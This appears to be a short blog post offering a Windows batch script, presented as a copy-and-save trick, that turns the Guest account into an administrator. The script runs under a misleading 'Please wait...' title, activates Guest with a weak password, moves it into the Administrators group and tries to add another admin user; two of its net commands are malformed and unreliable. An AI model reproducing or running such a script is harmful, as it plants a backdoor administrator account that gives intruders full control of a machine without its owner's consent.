Make guest as administrator
Code:------------------------------start copy from below-------------------------------------------------------------------------------------echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
---------------------------------end copy--------------------------------------------------------------------------------------------------
copy the given code and save it as .bat extension
If you liked this and the other posts please comment .
0 Response to "Make guest as administrator"
Post a Comment